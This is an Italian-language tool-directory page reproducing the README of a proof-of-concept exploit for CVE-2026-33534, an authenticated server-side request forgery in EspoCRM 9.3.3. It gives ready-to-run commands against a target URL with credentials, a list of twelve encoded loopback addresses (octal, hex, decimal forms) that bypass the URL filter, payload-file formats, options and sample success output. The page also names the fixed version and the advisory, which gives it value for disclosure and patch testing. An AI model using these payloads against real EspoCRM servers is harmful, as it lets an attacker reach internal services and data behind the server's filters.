Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33534 — EspoCRM 9.3.3 - SSRF autenticato tramite notazione IPv4 alternativa | Kitploit
Strumenti/GitHubGitHub/entrovyx/cve-2026-33534
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubentrovyx/cve-2026-33534

CVE-2026-33534

EspoCRM 9.3.3 - SSRF autenticato tramite notazione IPv4 alternativa

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-33534 - EspoCRM 9.3.3 SSRF autenticato

Proof-of-concept di SSRF autenticato per EspoCRM 9.3.3 tramite notazione alternativa IPv4 loopback nell'endpoint /api/v1/Attachment/fromImageUrl.

Riepilogo

EspoCRM 9.3.3 blocca gli URL loopback diretti come http://127.0.0.1/..., ma il percorso di fetch lato server accetta rappresentazioni IPv4 alternative che cURL normalizza in loopback. Ciò consente a un utente autenticato con accesso al flusso di caricamento allegati/immagini interessato di far recuperare al server EspoCRM risorse interne.

L'exploit invia prima una richiesta di controllo diretta a 127.0.0.1 e si aspetta che venga bloccata con HTTP 403. Successivamente testa più payload loopback codificati e segnala quali producono un allegato memorizzato.

Versione interessata

  • Vulnerabile: EspoCRM 9.3.3
  • Corretta: EspoCRM 9.3.4
  • Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
  • CVE: CVE-2026-33534
  • CWE: CWE-918
  • Requisiti

    • Python 3
    • requests
    • Credenziali EspoCRM valide
    • Permesso di utilizzare il campo allegato/immagine del target

    Installa la dipendenza:

    root@kitploit:~
    python3 -m pip install requests
    

    Utilizzo

    Validazione locale di base contro un'istanza EspoCRM in esecuzione sulla porta 8083:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u http://127.0.0.1:8083 \
      -U admin \
      -P 'Admin12345!' \
      --internal-port 8083 \
      --cleanup
    

    Testa un servizio interno su porta e percorso personalizzati:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u https://target.example \
      -U user \
      -P 'password' \
      --internal-port 9002 \
      --internal-path /interno.png \
      --cleanup
    

    Usa solo payload personalizzati:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u https://target.example \
      -U user \
      -P 'password' \
      --no-default-payloads \
      --payload 0x7f000001 \
      --payload 2130706433
    

    Payload predefiniti

    L'exploit testa queste rappresentazioni host loopback per impostazione predefinita:

    root@kitploit:~
    0177.0.0.1
    0177.0000.0000.0001
    0177.1
    0x7f.0.0.1
    0x7f.0x0.0x0.0x1
    0x7f000001
    2130706433
    017700000001
    127.1
    127.0.1
    127.000.000.001
    0000000000000000000000000177.0.0.1
    

    I file di payload personalizzati sono supportati. Ogni riga può essere:

    root@kitploit:~
    host
    label=host
    

    Esempio:

    root@kitploit:~
    hex-dword=0x7f000001
    decimal-dword=2130706433
    

    Esegui con:

    root@kitploit:~
    python3 CVE-2026-33534.py -u https://target.example -U user -P pass --payload-file payloads.txt
    

    Opzioni

    root@kitploit:~
    -u, --url                 URL base EspoCRM
    -U, --username            Nome utente EspoCRM
    -P, --password            Password EspoCRM
    --internal-port           Porta loopback interna da recuperare
    --internal-path           Percorso interno da recuperare
    --payload                 Notazione host loopback aggiuntiva
    --payload-file            File con un payload host per riga
    --no-default-payloads     Usa solo payload personalizzati
    --field                   Campo allegato, predefinito: avatar
    --parent-type             Tipo entità padre, predefinito: User
    --parent-id               ID entità padre opzionale
    --cleanup                 Elimina gli allegati creati dai payload riusciti
    --stop-on-first           Fermati dopo il primo bypass riuscito
    --insecure                Disabilita la verifica del certificato TLS
    

    Output previsto

    Uno sfruttamento riuscito mostra il controllo loopback diretto bloccato e uno o più payload codificati accettati:

    root@kitploit:~
    [*] Control response: HTTP 403 Not allowed URL.
    [+] octal dotted             0177.0.0.1        HTTP 200 id=... type=image/svg+xml size=4438
    [+] hex dword                0x7f000001        HTTP 200 id=... type=image/svg+xml size=4438
    
    [+] Vulnerable behavior confirmed.
    [+] Direct loopback control: HTTP 403
    [+] Successful payloads: 12
    

    Note

    • Il PoC predefinito recupera /client/img/logo-light.svg dal listener loopback del target stesso. Regola --internal-port e --internal-path per un altro servizio interno.
    • Il campo predefinito è User.avatar; usa --field, --parent-type e --parent-id se l'account testato necessita di un contesto di caricamento diverso.
    • Usa --cleanup durante i test per eliminare automaticamente gli allegati creati.
    Scarica lo strumento